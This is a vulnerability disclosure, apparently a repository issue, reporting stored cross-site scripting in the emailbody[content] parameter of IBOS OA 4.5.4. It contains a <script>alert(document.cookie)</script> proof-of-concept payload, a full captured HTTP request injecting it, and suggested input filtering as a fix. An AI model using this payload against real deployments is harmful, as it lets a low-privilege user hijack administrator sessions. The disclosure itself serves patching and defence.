Email function has XSS vulnerability in emailbody[content] parameter

## Test environment

os: windows
IBOS version: 4.5.4
Discovery time: 2020/1/12
download IBOS time: 2020/1/9

## Testing process

### create new user

Create a new account test1 with normal user permissions

![test-1](https://images.gitee.com/uploads/images/2020/0112/225001_8bb97739_1763950.png "屏幕截图.png")

login in the test1 and enter the email.

![test-2](https://images.gitee.com/uploads/images/2020/0112/225021_742e8a34_1763950.png "屏幕截图.png")

### Send email

Send email to Super Administrator

![test-3](https://images.gitee.com/uploads/images/2020/0112/225100_39d1ce16_1763950.png "屏幕截图.png")

Perform packet capture to modify the content sent,modify the ```emailbody[content]``` parameter value and add the payload like ``` <script>alert(document.cookie)</script>``` and "Forward" it.

![test-3](https://images.gitee.com/uploads/images/2020/0112/225156_c6600ff4_1763950.png "屏幕截图.png")

#### payload

```
<script>alert(document.cookie)</script>
```

and the test packet is like this.

```
POST /?r=email/content/add HTTP/1.1
Host: 192.168.126.141:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 423
Origin: [http://192.168.126.141:8090](http://192.168.126.141:8090)
Connection: close
Referer: [http://192.168.126.141:8090/?r=email/content/add](http://192.168.126.141:8090/?r=email/content/add)
Cookie: JV66_saltkey=R62zxTJ6; PHPSESSID=gsbu4no765jlira852mg7mp2b0; JV66_sid=K5NrmE; lastautologin=0; JV66_lastactivity=1578840035; JV66_ulastactivity=bd03C060mWlgg1zpb4SMJXTC9%2FA1PYx734o%2BZjxQ8U7Cnun%2FGGM0; JV66_lately.SelectBox=u_1; JV66_creditremind=0D0D2D1D0D0D5; JV66_creditbase=0D0D4D1D0D0; JV66_creditrule=%E5%86%99%E9%82%AE%E4%BB%B6; JV66_dropnotify=%7B%22user%22%3A%221%22%2C%22unread_notify%22%3A1%2C%22unread_atme%22%3A0%2C%22unread_comment%22%3A0%2C%22unread_message%22%3A0%2C%22new_folower_count%22%3A0%2C%22unread_total%22%3A1%7D
Upgrade-Insecure-Requests: 1

emailbody%5Btoids%5D=u_1&emailbody%5BisOtherRec%5D=0&emailbody%5BisWebRec%5D=0&emailbody%5Bcopytoids%5D=&emailbody%5Bsecrettoids%5D=&emailbody%5Bimportant%5D=0&emailbody%5Bsubject%5D=aaaaaaaaaaaaaaaaa&file=&emailbody%5Battachmentid%5D=&emailbody%5Bissend%5D=1&op=new&backurl=http%3A%2F%2F192.168.126.141%3A8090%2F%3Fr%3Demail%2Flist%2Findex&formhash=0ea1467f&emailbody%5Bcontent%5D=%3Cp%3Eaaassssssssss%3Cbr%2F%3E%3C%2Fp%3E<script>alert(document.cookie)</script>

```

### Login super managger

login the super manager and receive the email

![test-5](https://images.gitee.com/uploads/images/2020/0112/225414_21fb91c5_1763950.png "屏幕截图.png")

look the email content and it will run evil javascript code.Then it will show the cookie value

![test-6](https://images.gitee.com/uploads/images/2020/0112/225436_cdfb4177_1763950.png "屏幕截图.png")

## Solution

filter or encode special characters like this

```
<
>
"
'
&
%
... ...
```
and filter some keyword like this

```

script
javascript

... ...
```
or filter some label function which can run javascript like this

```
onclick
onerror
onload
... ...
```

IBOS开源OA协同办公管理/IBOS

Content Risk Flag

Comments (0)

IBOS开源OA协同办公管理/IBOS .gitee-modal { width: 500px !important; }

Content Risk Flag